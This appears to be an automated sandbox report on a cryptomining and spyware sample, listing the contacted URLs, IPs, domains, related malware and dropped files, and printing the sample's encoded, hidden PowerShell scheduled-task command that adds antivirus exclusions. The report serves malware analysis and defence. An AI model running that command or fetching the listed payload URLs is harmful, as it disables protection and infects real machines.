https://stackoverflow.com/q/11564914/23354;	HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/2152978/23354	yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.2276324576.00000185B222A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.2377005576.00000185C206C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://xmrig.com/docs/algorithms	aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://eemmbryequo.shop/	RegAsm.exe, 00000018.00000002.2787828639.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://xmrig.com/benchmark/%s	aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://2x.si/o3M.dll;	aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880131000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000006.00000002.2276324576.00000185B2001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://files.catbox.moe/k541xr.dll	aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880131000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194703677.000002EACF091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2276324576.00000185B2001000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.4611134630.0000020880001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micros	powershell.exe, 00000006.00000002.2398415947.00000185CA773000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
95.179.241.203	pool.hashvault.pro	Netherlands	20473	AS-CHOOPAUS	true
172.67.143.156	2x.si	United States	13335	CLOUDFLARENETUS	false
45.11.229.96	strompreis.ru	Germany	397525	ALPHAONE-ASUS	true
104.21.39.11	eemmbryequo.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1513635
Start date and time:	2024-09-19 02:24:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	PT54FFSL7ET46RASB.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@38/24@4/4
EGA Information:	Successful, ratio: 55.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 20.189.173.20
Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, blobcollector.events.data.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
Execution Graph export aborted for target Current.exe, PID 3640 because it is empty
Execution Graph export aborted for target HPd7I3vQri.exe, PID 5476 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3604 because it is empty
Execution Graph export aborted for target yTRfYxWiym.exe, PID 764 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:25:12	Task Scheduler	Run new task: syxrdknrha path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
02:25:12	Task Scheduler	Run new task: Current path: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
20:25:10	API Interceptor	1x Sleep call for process: yTRfYxWiym.exe modified
20:25:14	API Interceptor	26x Sleep call for process: powershell.exe modified
20:25:15	API Interceptor	5531837x Sleep call for process: HPd7I3vQri.exe modified
20:25:17	API Interceptor	833984x Sleep call for process: aspnet_compiler.exe modified
20:26:04	API Interceptor	1x Sleep call for process: RegAsm.exe modified
20:26:08	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
95.179.241.203	file.exe	Get hash	malicious	Xmrig	Browse
	66dd2c2d3b88f_opera.exe	Get hash	malicious	Xmrig	Browse
	gutpOKDunr.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.FileRepMalware.3253.21057.exe	Get hash	malicious	Xmrig	Browse
	sc7Qi5VdE1.exe	Get hash	malicious	Xmrig	Browse
	II.exe	Get hash	malicious	Xmrig	Browse
	E5r67vtBtc6.exe	Get hash	malicious	Xmrig	Browse
	Miner-XMR2.exe	Get hash	malicious	Xmrig	Browse
	Setup.exe	Get hash	malicious	RedLine, Xmrig	Browse
	oeIIpu88kP.exe	Get hash	malicious	Xmrig	Browse
172.67.143.156	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse
172.67.143.156	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse
45.11.229.96	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse
	4FwNHRnnXb.exe	Get hash	malicious	PureLog Stealer	Browse
104.21.39.11	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse
	log-analyzer.exe	Get hash	malicious	LummaC, MicroClip	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
2x.si	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
2x.si	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	172.67.143.156
pool.hashvault.pro	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	System.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	142.202.242.45
	System.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	Update.exe	Get hash	malicious	Blank Grabber, Redline Clipper, Xmrig	Browse	45.76.89.70
	66dd2c2d3b88f_opera.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	04cde81ac938706771fa9fe936ee8f79fe7e079973098.exe	Get hash	malicious	RedLine, Xmrig	Browse	142.202.242.43
	file.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	95.179.241.203
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
strompreis.ru	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.11.229.96
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
	4FwNHRnnXb.exe	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
eemmbryequo.shop	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	104.21.39.11
	l6E.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	log-analyzer.exe	Get hash	malicious	LummaC, MicroClip	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
bg.microsoft.map.fastly.net	https://apha-cites-application.azurewebsites.net/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://okcoin.83670.cyou/Index/index/Lang/it-it/Trade/tradelist	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://jans-radical-site-16409d.webflow.io/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://santander-competencia.activaonline.cl/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://terjal.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	http://sreypheasin.github.io/Netflix/	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	http://meatamasklogine.gitbook.io/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://pub-60aa8cdea4ff48c8b784d120879cbb5a.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://request-checksid-711843.pages.dev/robots.txt/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://neebedankt-f8cdcf.ingress-earth.ewp.live/wp-content/plugins/esidemthuis/pages/region.php?lca	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	http://www.national-delivery.com/Fuel_Surcharge	Get hash	malicious	Unknown	Browse	207.148.0.16
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	System.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	http://moodys-local.com	Get hash	malicious	Unknown	Browse	137.220.35.134
	RFQ#TLPO15-13.xla.xlsx	Get hash	malicious	Remcos, PureLog Stealer	Browse	149.28.221.9
	PO2-2401-0016 (TR).exe	Get hash	malicious	FormBook	Browse	104.207.148.137
	SecuriteInfo.com.Trojan.Siggen29.8143.15092.30622.exe	Get hash	malicious	Xmrig	Browse	136.244.83.0
	https://muse.krazzykriss.com/euXwoAHHk8kex8qSTdHcggmRldBY39LMG4uUyRSCr8YTiZWCVseCgkDHltIAlIXPE4ydxAqOhdFYmA=='%3E%3C/script%3E%3C/body%3E%3C/html%3E	Get hash	malicious	Unknown	Browse	45.77.78.73
	http://www.tucsonrealtors.org	Get hash	malicious	Unknown	Browse	45.77.78.73
CLOUDFLARENETUS	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	104.21.39.11
	ESD99W89W99-PO9W2788Q-SHK092782.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://okcoin.83670.cyou/Index/index/Lang/it-it/Trade/tradelist	Get hash	malicious	Unknown	Browse	104.21.13.231
	http://jans-radical-site-16409d.webflow.io/	Get hash	malicious	Unknown	Browse	104.18.161.117
	http://terjal.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://sreypheasin.github.io/Netflix/	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://in-50card.ru/wr	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://meatamasklogine.gitbook.io/	Get hash	malicious	Unknown	Browse	172.64.147.209
	http://pub-60aa8cdea4ff48c8b784d120879cbb5a.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
CLOUDFLARENETUS	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	104.21.39.11
	ESD99W89W99-PO9W2788Q-SHK092782.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://okcoin.83670.cyou/Index/index/Lang/it-it/Trade/tradelist	Get hash	malicious	Unknown	Browse	104.21.13.231
	http://jans-radical-site-16409d.webflow.io/	Get hash	malicious	Unknown	Browse	104.18.161.117
	http://terjal.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://sreypheasin.github.io/Netflix/	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://in-50card.ru/wr	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://meatamasklogine.gitbook.io/	Get hash	malicious	Unknown	Browse	172.64.147.209
	http://pub-60aa8cdea4ff48c8b784d120879cbb5a.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
ALPHAONE-ASUS	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.11.229.96
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
	Aqua.mpsl-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	Aqua.arm7-20240804-2157.elf	Get hash	malicious	Mirai	Browse	45.13.227.24
	Aqua.mips-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	Aqua.x86_64-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	38.79.86.219
	ca1b58Nxwf.elf	Get hash	malicious	Unknown	Browse	45.13.227.201
	GWtByYqyGD.elf	Get hash	malicious	Unknown	Browse	45.13.227.201

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
	http://santander-competencia.activaonline.cl/	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://in-50card.ru/wr	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://request-checksid-711843.pages.dev/robots.txt/	Get hash	malicious	Unknown	Browse	172.67.143.156
	http://caklwi392xqq.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.67.143.156
	https://iostart-trezori.github.io/	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://piyush-ally9.github.io/Netflix-Clone	Get hash	malicious	HTMLPhisher	Browse	172.67.143.156
	https://aisthd.xyz/	Get hash	malicious	Unknown	Browse	172.67.143.156
	http://www.telegraxms.club/	Get hash	malicious	Telegram Phisher	Browse	172.67.143.156
	https://treezoriostart.github.io/	Get hash	malicious	Unknown	Browse	172.67.143.156
a0e9f5d64349fb13191bc781f81f42e1	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	104.21.39.11
	http://gsx2-crm-apple-portal.com/go.php	Get hash	malicious	Unknown	Browse	104.21.39.11
	x64_stealth.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	104.21.39.11
	software.exe	Get hash	malicious	LummaC	Browse	104.21.39.11
	DLPAgent.msi	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	104.21.39.11
	l6E.exe	Get hash	malicious	LummaC	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC	Browse	104.21.39.11
	file.exe	Get hash	malicious	SmokeLoader	Browse	104.21.39.11
	log-analyzer.exe	Get hash	malicious	LummaC, MicroClip	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	104.21.39.11

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\l6E.exe	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse
C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_f4bd9c552ad4590b880a3e2579c837dc0c6c7_67dfe02b_084867d1-ed5d-409c-a7ed-e68c4ca9311f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0814309981490267
Encrypted:	false
SSDEEP:	192:XaXOdteFy/8o+/0Nvw4MjezEKMpzuiFGZ24IO8Z:K+djb+sNvw5jeipzuiFGY4IO8Z
MD5:	8B29A12D9B4C133CF891F900BDE83A3E
SHA1:	607E1C40E5C459D8CC3F0E3CAD88E855C7868255
SHA-256:	61E726B3471306679E3E7CD60198903321F19807304EBD060C5678ED0AA29F03
SHA-512:	08DB567F9421588143E0E0CFA7B1145002B38815A213E77B568A6C13E387F588C4F89F02A9FA9D6F5C1522627AF61765266AFC874ED327977CFF495501E57BFA
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.1.7.9.1.6.5.9.4.9.8.1.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.1.7.9.1.6.6.7.4.6.6.9.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.4.8.6.7.d.1.-.e.d.5.d.-.4.0.9.c.-.a.7.e.d.-.e.6.8.c.4.c.a.9.3.1.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.9.4.a.b.4.1.-.3.4.f.7.-.4.a.9.a.-.8.c.5.3.-.c.c.b.4.0.5.e.4.d.4.0.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.c.0.-.0.0.0.1.-.0.0.1.5.-.a.2.b.d.-.a.d.8.2.2.a.0.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1346.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Sep 19 00:26:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	107520
Entropy (8bit):	2.0924404836840806
Encrypted:	false
SSDEEP:	384:shYNndTVplBq5HnmEAMBuLxxmbWlUrniDceXvE6LsO53eH6+suzh9JJD8vRtxO3O:82d7lBq5nmERMLxsavDcgswIX3FsJ
MD5:	7FFE38E10D30D1B7EA6BF05517A5983B
SHA1:	363D782EE0C84C9F3947BF014A699398E6819856
SHA-256:	5A15EB6E884187E76038A182ECEED0D48C94F33B5EA38977BF29D2B80FFA12E3
SHA-512:	F7C978C8F1E0F35CF75043EF09D4CB96E12C9EC1807AAAAD8328C68A6EE94BE3528A1361B9A01E6011BB4450C48C698D1C8751D4E727DEC27580C5795E56B714
Malicious:	false
Preview:	MDMP..a..... ........o.f....................................<...L%..........>I..........`.......8...........T............D..._...........%..........t'..............................................................................eJ.......(......GenuineIntel............T............o.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1589.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6302
Entropy (8bit):	3.7193573861558713
Encrypted:	false
SSDEEP:	192:R6l7wVeJaI6KEDTY9WQbprlx89blrsfGXm:R6lXJl65DTY9WNlwfX
MD5:	FE3A595038FD1076B867269DF75AB9A4
SHA1:	7602F52BF7309ECA79C1F0BB59FA37FEB1B66D21
SHA-256:	CD2D54EED5A093ABCE486F396E46AF2F1CB853FAC5D4C7EAB240761C06C9280E
SHA-512:	2E28E6DE031201AF56FC7BD2DA08ACEA166317C7FDAFE96E1E3CB380500AF471BFD71B02066A7FEFD04CF738AD34911866F3DE858BEFE127CC6CC8508A82A4F2
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15B9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4640
Entropy (8bit):	4.449032755077937
Encrypted:	false
SSDEEP:	48:cvIwWl8zs4NJg77aI93ALXWpW8VYj1PYm8M4JfurMFB0+q8o9aQgLuOLuDwMLrd:uIjfUI7NALm7VkSJfu00vABukuLLrd
MD5:	C48DCEC864605CD41A512006D945226A
SHA1:	8B782AEC8913731D8FDCCFF48C72665E27E40055
SHA-256:	AE7FFAB630C06DED2BABE58A6FA57F02DFB9FD19776B60BC7A853B96B986B1E1
